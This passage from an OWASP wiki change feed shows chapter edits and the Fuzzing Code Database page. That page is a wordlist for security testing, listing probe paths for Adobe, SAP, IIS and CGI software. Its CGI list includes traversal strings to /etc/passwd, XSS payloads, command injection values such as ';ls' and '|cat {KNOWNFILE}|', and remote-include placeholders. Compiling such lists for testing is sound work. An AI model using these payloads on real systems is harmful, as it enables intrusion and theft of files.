| reason_for_sponsorship = Working together with volunteers to develop the OWASP and spread the work in Brazil&lt;br /&gt;
|-&lt;br /&gt;
| status = requesting fundings&lt;br /&gt;
|-&lt;br /&gt;
| letter sent to sponsor = &lt;br /&gt;
|-&lt;br /&gt;
| notes for Kate =   &lt;br /&gt;
|-&lt;br /&gt;
| attendee_name_mask = &amp;lt;!--Please replace DO NOT EDIT this string --&amp;gt; Attendee126&lt;br /&gt;
| attendee_home_page = &amp;lt;!--Please replace DO NOT EDIT this string --&amp;gt; Summit_2011_Attendee/Attendee126&lt;br /&gt;
}}&lt;/div&gt;</summary>
		<author><name>Wagner.elias</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Sao_Paulo&amp;diff=94292</id>
		<title>Sao Paulo</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Sao_Paulo&amp;diff=94292"/>
				<updated>2010-11-29T17:00:20Z</updated>
		
		<summary type="html">&lt;p&gt;Wagner.elias: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Chapter Template|chaptername=Sao Paulo|extra=The chapter leader is [mailto:wagner.elias@owasp.org Wagner Elias]|mailinglistsite=http://lists.owasp.org/mailman/listinfo/owasp-Sao_Paulo|emailarchives=http://lists.owasp.org/pipermail/owasp-Sao_Paulo}}&lt;br /&gt;
&lt;br /&gt;
== Local News ==&lt;br /&gt;
&lt;br /&gt;
 '''Meeting Location'''&lt;br /&gt;
&lt;br /&gt;
Everyone is welcome to join us at our chapter meetings.&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Chapter]]&lt;br /&gt;
[[Category:Brasil]]&lt;/div&gt;</summary>
		<author><name>Wagner.elias</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=92529</id>
		<title>Category:OWASP Fuzzing Code Database</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=92529"/>
				<updated>2010-11-09T02:17:26Z</updated>
		
		<summary type="html">&lt;p&gt;Wagner.elias: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This database is a collection of several statements used in code injection, fuzzing and brute-force aproach. All too often security professionals rely on their own repositories of statements collected from assessments they've conducted. These repositories are prone to being incomplete or outdated. We want to collect all these statements, merging the statements from several projects like [[WebScarab]], [[WebSlayer]] and [[JBroFuzz]] with member contributions to build a comprehensive dataset of effective statements to provide better testing results. Please add your own statements and check out the statements already added. &lt;br /&gt;
&lt;br /&gt;
==== News  ====&lt;br /&gt;
&lt;br /&gt;
'''08 November 2010'''&lt;br /&gt;
&lt;br /&gt;
*Created new Category: Adobe XML Files (08 November 2010 - Total Statements: 16)&lt;br /&gt;
&lt;br /&gt;
'''15 September 2010'''&lt;br /&gt;
&lt;br /&gt;
*Created new Category: SAP Common URL Web Interfaces (15 September 2010 - Total Statements: 6)&lt;br /&gt;
&lt;br /&gt;
'''17 March 2010'''&lt;br /&gt;
&lt;br /&gt;
*Created new Category: Vulnerable Cross-Platform CGI (17 March 2010 - Total Statements: 563)&lt;br /&gt;
*Created new Category: Windows Directory Traversal (Update: 17 March 2010 - Total Statements: 16)&lt;br /&gt;
*Created new Category: Generic 8 Directory Deep Traversal Fuzz (17 March 2010 - Total Statements: 879)&lt;br /&gt;
*Created new Category: Common Windows CGI (Update: 17 March 2010 - Total Statements: 76)&lt;br /&gt;
*Created new Category: File Upload Filter Bypass (Update: 17 March 2010 - Total Statements: 4)&lt;br /&gt;
*Created new Category: Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 2)&lt;br /&gt;
*Created new Category: Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 7)&lt;br /&gt;
*Created new Category: Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 14)&lt;br /&gt;
*Created new Category: Commonly Writable directories File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 9)&lt;br /&gt;
&lt;br /&gt;
'''16 March 2010'''&lt;br /&gt;
&lt;br /&gt;
*Created new Category: Common Data File Extensions (Update: 16 March 2010 - Total Statements: 863)&lt;br /&gt;
*Created new Category: Uncommon Data File Extensions (Update: 16 March 2010 - Total Statements: 284) &lt;br /&gt;
*Created new Category: Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65)&lt;br /&gt;
*Created new Category: All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2010 - Total Statements: 31)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''02 February 2010'''&lt;br /&gt;
&lt;br /&gt;
*Created new Category Lotus/Notes Files&lt;br /&gt;
&lt;br /&gt;
'''11 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Created new Category: XML Attacks&lt;br /&gt;
&lt;br /&gt;
''Update Statements'' &lt;br /&gt;
&lt;br /&gt;
*15 new XML Statements &lt;br /&gt;
*93 new SQL Injections Statements &lt;br /&gt;
*67 new Traversal Directory Statements &lt;br /&gt;
*Delete 33 XSS Statement Duplicate &lt;br /&gt;
*30 New XSS Statements&lt;br /&gt;
&lt;br /&gt;
'''7 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Updated the objectives of the project.&lt;br /&gt;
&lt;br /&gt;
'''21 July 2009''' &lt;br /&gt;
&lt;br /&gt;
*Set the team responsible for the project.&lt;br /&gt;
&lt;br /&gt;
==== Goals  ====&lt;br /&gt;
&lt;br /&gt;
This project intend to create a database that concentrate all tools which are based on wordlists such as Webscarab, JBroFuzz, Web Slayer , Dirbuster. and others. In addition to current tools developed by OWASP members we will create a database following a style similar to Open Vulnerability and Assessment Language (OVAL) where any tool can adopt and use a XML file maintained by OWASP. &lt;br /&gt;
&lt;br /&gt;
In addition, the following functionalities will be included on this project: &lt;br /&gt;
&lt;br /&gt;
1 - The statements of ASDR Project 2 - Browser 3 - Operational System 4 - Databases &lt;br /&gt;
&lt;br /&gt;
An URL will also be published to create an collaborative environment for the maintenance process where the following features are planned: &lt;br /&gt;
&lt;br /&gt;
1 - Deploy a process where a new statement can be suggested and registered if is not valid yet and not maintained in other database. &lt;br /&gt;
&lt;br /&gt;
2 - A list where besides the statement, a single id will be maintained to identify each statement with a description and the results of the exploitation. &lt;br /&gt;
&lt;br /&gt;
3 - Possibility to support users on the report of their own experiences with the statements. &lt;br /&gt;
&lt;br /&gt;
==== Statements  ====&lt;br /&gt;
&lt;br /&gt;
=== Adobe XML Files (08 November 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
/flex2gateway/&lt;br /&gt;
/flex2gateway/http&lt;br /&gt;
/flex2gateway/httpsecure&lt;br /&gt;
/flex2gateway/cfamfpoolling&lt;br /&gt;
/flex2gateway/amf&lt;br /&gt;
/flex2gateway/amfpolling&lt;br /&gt;
/messagebroker/http&lt;br /&gt;
/messagebroker/httpsecure&lt;br /&gt;
/blazeds/messagebroker/http&lt;br /&gt;
/blazeds/messagebroker/httpsecure&lt;br /&gt;
/samples/messagebroker/http&lt;br /&gt;
/samples/messagebroker/httpsecure&lt;br /&gt;
/lcds/messagebroker/http&lt;br /&gt;
/lcds/messagebroker/httpsecure&lt;br /&gt;
/lcds-samples/messagebroker/http&lt;br /&gt;
/lcds-samples/messagebroker/httpsecure&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== SAP Commom URL Web Interface (15 September 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
/sap/bc/gui/sap/its/webgui&lt;br /&gt;
/sap/public/icman/ping&lt;br /&gt;
/sap/admin&lt;br /&gt;
/sap/public/info&lt;br /&gt;
/sap/wdisp/admin&lt;br /&gt;
/scripts/wgate&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Microsoft URLs (8 April 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Interesting IIS Files &amp;amp; Directories (8 April 2010)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
# Look at the result codes in the headers - 403 likely mean the dir exists, 404  means not. It takes an ISAPI filter for IIS to return 404's for 403s. &lt;br /&gt;
# Altetrnatively, slight differences in the number of bytes returned will help differentiate.&lt;br /&gt;
&lt;br /&gt;
/.printer&lt;br /&gt;
/%NETHOOD%/&lt;br /&gt;
/&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;.aspx&lt;br /&gt;
/AccessPlatform/&lt;br /&gt;
/AccessPlatform/auth/&lt;br /&gt;
/AccessPlatform/auth/clientscripts/cookies.js &lt;br /&gt;
/AccessPlatform/auth/clientscripts/login.js &lt;br /&gt;
/Exadmin/&lt;br /&gt;
/ExchWeb/&lt;br /&gt;
/Exchange/&lt;br /&gt;
/Microsoft-Server-ActiveSync/&lt;br /&gt;
/OMA/&lt;br /&gt;
/OWA/&lt;br /&gt;
/Public/&lt;br /&gt;
/_layouts/alllibs.htm&lt;br /&gt;
/_layouts/settings.htm&lt;br /&gt;
/_layouts/userinfo.htm&lt;br /&gt;
/_vti_bin/&lt;br /&gt;
/_vti_bin/_vti_aut/fp30reg.dll&lt;br /&gt;
/_vti_pvt/&lt;br /&gt;
/_WEB_INF/&lt;br /&gt;
/a%5c.aspx&lt;br /&gt;
/adovbs.inc&lt;br /&gt;
/aspnet_files/&lt;br /&gt;
/certcontrol/&lt;br /&gt;
/certenroll/&lt;br /&gt;
/certsrv/&lt;br /&gt;
/citrix/&lt;br /&gt;
/citrix/AccessPlatform/auth/&lt;br /&gt;
/citrix/AccessPlatform/auth/clientscripts/&lt;br /&gt;
/AccessPlatform/auth/clientscripts/&lt;br /&gt;
/Citrix//AccessPlatform/auth/clientscripts/cookies.js &lt;br /&gt;
/Citrix/AccessPlatform/auth/clientscripts/login.js &lt;br /&gt;
/Citrix/PNAgent/config.xml&lt;br /&gt;
/exchange/root.asp&lt;br /&gt;
/forum.asp&lt;br /&gt;
/forum_arc.asp&lt;br /&gt;
/forum_professionnel.asp&lt;br /&gt;
/iisadmin/&lt;br /&gt;
/iisadmpwd/achg.htr&lt;br /&gt;
/iisadmpwd/aexp.htr&lt;br /&gt;
/iisadmpwd/aexp2.htr&lt;br /&gt;
/iisadmpwd/aexp2b.htr&lt;br /&gt;
/iisadmpwd/aexp3.htr&lt;br /&gt;
/iisadmpwd/aexp4.htr&lt;br /&gt;
/iisadmpwd/aexp4b.htr&lt;br /&gt;
/iisadmpwd/anot.htr&lt;br /&gt;
/iisadmpwd/anot3.htr&lt;br /&gt;
/iiasdmpwd/&lt;br /&gt;
/iishelp/&lt;br /&gt;
/iishelp/iis/misc/default.asp&lt;br /&gt;
/iissamples/&lt;br /&gt;
/imprimer.asp&lt;br /&gt;
/includes/adovbs.inc&lt;br /&gt;
/msadc/&lt;br /&gt;
/null.htw&lt;br /&gt;
/pbserver/pbserver.dll&lt;br /&gt;
/postinfo.html&lt;br /&gt;
/rubrique.asp&lt;br /&gt;
/scripts/&lt;br /&gt;
/scripts/fpcount.exe&lt;br /&gt;
/scripts/cgimail.exe&lt;br /&gt;
/scripts/tools/newdsn.exe&lt;br /&gt;
/scripts/tools/getdrvs.exe&lt;br /&gt;
/scripts/convert.bas&lt;br /&gt;
/cgi-bin/htmlscript&lt;br /&gt;
/scripts/counter.exe&lt;br /&gt;
/scripts/no-such-file.pl&lt;br /&gt;
/share/&lt;br /&gt;
/tsweb/&lt;br /&gt;
/~/&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;.asp&lt;br /&gt;
/~/&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;.aspx&lt;br /&gt;
/index.shtml&lt;br /&gt;
/x.htw&lt;br /&gt;
/x.ida&lt;br /&gt;
/x.idq&lt;br /&gt;
/cgi&lt;br /&gt;
/scripts/iisadmin/ism.dll?http/dir&lt;br /&gt;
/scripts/samples/search/webhits.exe&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Vulnerable Cross-Platform CGI (17 March 2010 - Total Statements: 563) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Vulnerable Cross-Platform CGI (17 March 2010) &lt;br /&gt;
# fuzz inside cgi directories&lt;br /&gt;
# on windows, this is usually /scripts or /bin or /cgi-bin, on unix, usually /cgi-bin, /nph-cgi&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
&lt;br /&gt;
%2e%2e/abyss.conf&lt;br /&gt;
.access&lt;br /&gt;
.cobalt&lt;br /&gt;
.cobalt/alert/service.cgi?service=&amp;lt;img%20src=javascript:alert('XSS')&amp;gt;&lt;br /&gt;
.cobalt/alert/service.cgi?service=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
.fhp&lt;br /&gt;
.htaccess&lt;br /&gt;
.htaccess.old&lt;br /&gt;
.htaccess.save&lt;br /&gt;
.htaccess~&lt;br /&gt;
.htpasswd&lt;br /&gt;
.nsconfig&lt;br /&gt;
.passwd&lt;br /&gt;
.www_acl&lt;br /&gt;
.wwwacl&lt;br /&gt;
/_vti_pvt/doctodep.btr&lt;br /&gt;
14all-1.1.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
14all.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
AT-admin.cgi&lt;br /&gt;
AT-generate.cgi&lt;br /&gt;
Album?mode=album&amp;amp;album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&amp;amp;dispsize=640&amp;amp;start=0&lt;br /&gt;
AnyBoard.cgi&lt;br /&gt;
AnyForm&lt;br /&gt;
AnyForm2&lt;br /&gt;
Backup/add-passwd.cgi&lt;br /&gt;
C&lt;br /&gt;
Count.cgi&lt;br /&gt;
DC&lt;br /&gt;
DCFORM&lt;br /&gt;
File&lt;br /&gt;
FormHandler.cgi?realname=aaa&amp;amp;email=aaa&amp;amp;reply_message_template=%2Fetc%2Fpasswd&amp;amp;reply_message_from=sq%40example.com&amp;amp;redirect=http%3A%2F%2Fwww.example.com&amp;amp;recipient=sq%40example.com&lt;br /&gt;
FormMail.cgi?&amp;lt;script&amp;gt;alert(\&lt;br /&gt;
FormMail.pl&lt;br /&gt;
ImageFolio/admin/admin.cgi&lt;br /&gt;
LWGate&lt;br /&gt;
LWGate.cgi&lt;br /&gt;
Upload.pl&lt;br /&gt;
Vs&lt;br /&gt;
W&lt;br /&gt;
YaBB.pl?board=news&amp;amp;action=display&amp;amp;num=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
YaBB/YaBB.cgi?board=BOARD&amp;amp;action=display&amp;amp;num=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp3.cgi?../../../../../../..{KNOWNFILE}&lt;br /&gt;
a1stats/a1disp4.cgi?../../../../../../..{KNOWNFILE}&lt;br /&gt;
add_ftp.cgi&lt;br /&gt;
addbanner.cgi&lt;br /&gt;
adduser.cgi&lt;br /&gt;
admin.cgi&lt;br /&gt;
admin.cgi?list=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
admin.php&lt;br /&gt;
admin.php3&lt;br /&gt;
admin.pl&lt;br /&gt;
adminhot.cgi&lt;br /&gt;
adminwww.cgi&lt;br /&gt;
af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd&lt;br /&gt;
aglimpse&lt;br /&gt;
aglimpse.cgi&lt;br /&gt;
alibaba.pl|dir%20..\\..\\..\\..\\..\\..\\..\\,&lt;br /&gt;
alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd&lt;br /&gt;
amadmin.pl&lt;br /&gt;
anacondaclip.pl?template=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ans.pl?p=../../../../../usr/bin/id|&amp;amp;blah&lt;br /&gt;
ans/ans.pl?p=../../../../../usr/bin/id|&amp;amp;blah&lt;br /&gt;
anyboard.cgi&lt;br /&gt;
archie&lt;br /&gt;
architext_query.cgi&lt;br /&gt;
architext_query.pl&lt;br /&gt;
ash&lt;br /&gt;
astrocam.cgi&lt;br /&gt;
atk/javascript/class.atkdateattribute.js.php?config_atkroot=@RFIURL&lt;br /&gt;
auction/auction.cgi?action=&lt;br /&gt;
auctiondeluxe/auction.pl&lt;br /&gt;
auktion.cgi?menue=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
auth_data/auth_user_file.txt&lt;br /&gt;
awl/auctionweaver.pl&lt;br /&gt;
awstats.pl&lt;br /&gt;
awstats/awstats.pl&lt;br /&gt;
ax-admin.cgi&lt;br /&gt;
ax.cgi&lt;br /&gt;
axs.cgi&lt;br /&gt;
badmin.cgi&lt;br /&gt;
banner.cgi&lt;br /&gt;
bannereditor.cgi&lt;br /&gt;
bash&lt;br /&gt;
bb-hist?HI&lt;br /&gt;
bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK&lt;br /&gt;
bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK&lt;br /&gt;
bbs_forum.cgi&lt;br /&gt;
betsie/parserl.pl/&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;;&lt;br /&gt;
bigconf.cgi?command=view_textfile&amp;amp;file={KNOWNFILE}&amp;amp;filters=&lt;br /&gt;
bizdb1-search.cgi&lt;br /&gt;
blog/&lt;br /&gt;
blog/mt-check.cgi&lt;br /&gt;
blog/mt-load.cgi&lt;br /&gt;
blog/mt.cfg&lt;br /&gt;
bnbform&lt;br /&gt;
bnbform.cgi&lt;br /&gt;
book.cgi?action=default&amp;amp;current=|cat%20{KNOWNFILE}|&amp;amp;form_tid=996604045&amp;amp;prev=main.html&amp;amp;list_message_index=10&lt;br /&gt;
boozt/admin/index.cgi?section=5&amp;amp;input=1&lt;br /&gt;
bsguest.cgi?email=x;ls&lt;br /&gt;
bslist.cgi?email=x;ls&lt;br /&gt;
build.cgi&lt;br /&gt;
bulk/bulk.cgi&lt;br /&gt;
c_download.cgi&lt;br /&gt;
cached_feed.cgi&lt;br /&gt;
cachemgr.cgi&lt;br /&gt;
cal_make.pl?p0=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
calendar&lt;br /&gt;
calendar.php?calbirthdays=1&amp;amp;action=getday&amp;amp;day=2001-8-15&amp;amp;comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22&lt;br /&gt;
calendar.pl&lt;br /&gt;
calendar/calendar_admin.pl?config=|cat%20{KNOWNFILE}|&lt;br /&gt;
calendar/index.cgi&lt;br /&gt;
calendar_admin.pl?config=|cat%20{KNOWNFILE}|&lt;br /&gt;
calender_admin.pl&lt;br /&gt;
campas?%0acat%0a{KNOWNFILE}%0a&lt;br /&gt;
cart.pl&lt;br /&gt;
cart.pl?db='&lt;br /&gt;
cartmanager.cgi&lt;br /&gt;
cbmc/forums.cgi&lt;br /&gt;
ccbill-local.cgi?cmd=MENU&lt;br /&gt;
ccbill-local.pl?cmd=MENU&lt;br /&gt;
cgforum.cgi&lt;br /&gt;
cgi-lib.pl&lt;br /&gt;
cgicso?query=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cgicso?query=AAA&lt;br /&gt;
cgiforum.pl?thesection=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
cgiwrap&lt;br /&gt;
cgiwrap/%3Cfont%20color=red%3E&lt;br /&gt;
cgiwrap/~@U&lt;br /&gt;
cgiwrap/~JUNK(5)&lt;br /&gt;
cgiwrap/~root&lt;br /&gt;
change-your-password.pl&lt;br /&gt;
classified.cgi&lt;br /&gt;
classifieds&lt;br /&gt;
classifieds.cgi&lt;br /&gt;
classifieds/classifieds.cgi&lt;br /&gt;
classifieds/index.cgi&lt;br /&gt;
clickcount.pl?view=test&lt;br /&gt;
clickresponder.pl&lt;br /&gt;
code.php&lt;br /&gt;
code.php3&lt;br /&gt;
com5..........................................................................................................................................................................................................................box&lt;br /&gt;
com5.java&lt;br /&gt;
com5.pl&lt;br /&gt;
commandit.cgi&lt;br /&gt;
commerce.cgi?page=../../../../../../../../../..{KNOWNFILE}%00index.html&lt;br /&gt;
common.php?f=0&amp;amp;ForumLang=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
common/listrec.pl&lt;br /&gt;
common/listrec.pl?APP=qmh-news&amp;amp;TEMPLATE=;ls%20/etc|&lt;br /&gt;
compatible.cgi&lt;br /&gt;
count.cgi&lt;br /&gt;
counter-ord&lt;br /&gt;
counterbanner&lt;br /&gt;
counterbanner-ord&lt;br /&gt;
counterfiglet-ord&lt;br /&gt;
counterfiglet/nc/&lt;br /&gt;
cs&lt;br /&gt;
csChatRBox.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csGuestBook.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csLive&lt;br /&gt;
csNews.cgi&lt;br /&gt;
csNewsPro.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csPassword.cgi&lt;br /&gt;
csPassword/csPassword.cgi&lt;br /&gt;
csh&lt;br /&gt;
cstat.pl&lt;br /&gt;
cutecast/members/&lt;br /&gt;
cvsblame.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvslog.cgi?file=*&amp;amp;rev=&amp;amp;root=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvslog.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvsquery.cgi?branch=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;file=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&amp;amp;date=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&lt;br /&gt;
cvsquery.cgi?module=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;branch=&amp;amp;dir=&amp;amp;file=&amp;amp;who=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&amp;amp;sortby=Date&amp;amp;hours=2&amp;amp;date=week&lt;br /&gt;
cvsqueryform.cgi?cvsroot=/cvsroot&amp;amp;module=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;branch=HEAD&lt;br /&gt;
dansguardian.pl?DENIEDURL=&amp;lt;/a&amp;gt;&amp;lt;script&amp;gt;alert('XSS');&amp;lt;/script&amp;gt;&lt;br /&gt;
dasp/fm_shell.asp&lt;br /&gt;
data/fetch.php?page=&lt;br /&gt;
date&lt;br /&gt;
day5datacopier.cgi&lt;br /&gt;
day5datanotifier.cgi&lt;br /&gt;
db2www/library/document.d2w/show&lt;br /&gt;
db4web_c/dbdirname/{KNOWNFILE}&lt;br /&gt;
db_manager.cgi&lt;br /&gt;
dbman/db.cgi?db=no-db&lt;br /&gt;
dcforum.cgi?az=list&amp;amp;forum=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
dcshop/auth_data/auth_user_file.txt&lt;br /&gt;
dcshop/orders/orders.txt&lt;br /&gt;
dfire.cgi&lt;br /&gt;
diagnose.cgi&lt;br /&gt;
dig.cgi&lt;br /&gt;
directorypro.cgi?want=showcat&amp;amp;show=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
displayTC.pl&lt;br /&gt;
dnewsweb&lt;br /&gt;
donothing&lt;br /&gt;
dose.pl?daily&amp;amp;somefile.txt&amp;amp;|ls|&lt;br /&gt;
download.cgi&lt;br /&gt;
dumpenv.pl&lt;br /&gt;
edit.pl&lt;br /&gt;
empower?DB=whateverwhatever&lt;br /&gt;
emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
enter.cgi&lt;br /&gt;
environ.cgi&lt;br /&gt;
environ.pl&lt;br /&gt;
environ.pl?param1=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
erba/start/%3Cscript%3Ealert('XSS');%3C/script%3E&lt;br /&gt;
eshop.pl/seite=;cat%20eshop.pl|&lt;br /&gt;
ex-logger.pl&lt;br /&gt;
excite&lt;br /&gt;
excite;IF&lt;br /&gt;
ezadmin.cgi&lt;br /&gt;
ezboard.cgi&lt;br /&gt;
ezman.cgi&lt;br /&gt;
ezshopper/loadpage.cgi?user_id=1&amp;amp;file=|cat%20{KNOWNFILE}|&lt;br /&gt;
ezshopper/search.cgi?user_id=id&amp;amp;database=dbase1.exm&amp;amp;template=../../../../../../..{KNOWNFILE}&amp;amp;distinct=1&lt;br /&gt;
ezshopper2/loadpage.cgi&lt;br /&gt;
ezshopper3/loadpage.cgi&lt;br /&gt;
faqmanager.cgi?toc={KNOWNFILE}%00&lt;br /&gt;
faxsurvey?cat%20{KNOWNFILE}&lt;br /&gt;
filemail&lt;br /&gt;
filemail.pl&lt;br /&gt;
finger&lt;br /&gt;
finger.pl&lt;br /&gt;
flexform&lt;br /&gt;
flexform.cgi&lt;br /&gt;
fom.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
fom/fom.cgi?cmd=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;file=1&amp;amp;keywords=vulnerable&lt;br /&gt;
formmail&lt;br /&gt;
formmail.cgi&lt;br /&gt;
formmail.cgi?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
formmail.pl&lt;br /&gt;
formmail.pl?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
formmail?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
fortune&lt;br /&gt;
ftp.pl&lt;br /&gt;
ftpsh&lt;br /&gt;
gH.cgi&lt;br /&gt;
gbadmin.cgi?action=change_adminpass&lt;br /&gt;
gbadmin.cgi?action=change_automail&lt;br /&gt;
gbadmin.cgi?action=colors&lt;br /&gt;
gbadmin.cgi?action=setup&lt;br /&gt;
gbook/gbook.cgi?_MAILTO=xx;ls&lt;br /&gt;
gbpass.pl&lt;br /&gt;
generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1&lt;br /&gt;
generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1&lt;br /&gt;
generate.cgi?content=../../../../../../../../../..{KNOWNFILE}%00board=board_1&lt;br /&gt;
getdoc.cgi&lt;br /&gt;
gettransbitmap&lt;br /&gt;
glimpse&lt;br /&gt;
gm-authors.cgi&lt;br /&gt;
gm-cplog.cgi&lt;br /&gt;
gm.cgi&lt;br /&gt;
guestbook.cgi&lt;br /&gt;
guestbook.cgi?user=cpanel&amp;amp;template=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
guestbook.pl&lt;br /&gt;
guestbook/passwd&lt;br /&gt;
handler.cgi&lt;br /&gt;
hitview.cgi&lt;br /&gt;
horde/test.php&lt;br /&gt;
horde/test.php?mode=phpinfo&lt;br /&gt;
hsx.cgi?show=../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
htgrep?file=index.html&amp;amp;hdr={KNOWNFILE}&lt;br /&gt;
html2chtml.cgi&lt;br /&gt;
html2wml.cgi&lt;br /&gt;
htmlscript?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
htsearch.cgi?words=%22%3E%3Cscript%3Ealert%'XSS'%29%3B%3C%2Fscript%3E&lt;br /&gt;
htsearch?-c/nonexistant&lt;br /&gt;
htsearch?config=foofighter&amp;amp;restrict=&amp;amp;exclude=&amp;amp;method=and&amp;amp;format=builtin-long&amp;amp;sort=score&amp;amp;words=&lt;br /&gt;
htsearch?exclude=%60{KNOWNFILE}%60&lt;br /&gt;
ibill.pm&lt;br /&gt;
icat&lt;br /&gt;
if/admin/nph-build.cgi&lt;br /&gt;
ikonboard/help.cgi?&lt;br /&gt;
imageFolio.cgi&lt;br /&gt;
imagefolio/admin/admin.cgi&lt;br /&gt;
imagemap&lt;br /&gt;
include/new-visitor.inc.php&lt;br /&gt;
index.js0x70&lt;br /&gt;
index.pl&lt;br /&gt;
info2www&lt;br /&gt;
info2www '(../../../../../../../bin/mail root &amp;lt;{KNOWNFILE}&amp;gt;&lt;br /&gt;
infosrch.cgi&lt;br /&gt;
ion-p?page=../../../../..{KNOWNFILE}&lt;br /&gt;
jailshell&lt;br /&gt;
jj&lt;br /&gt;
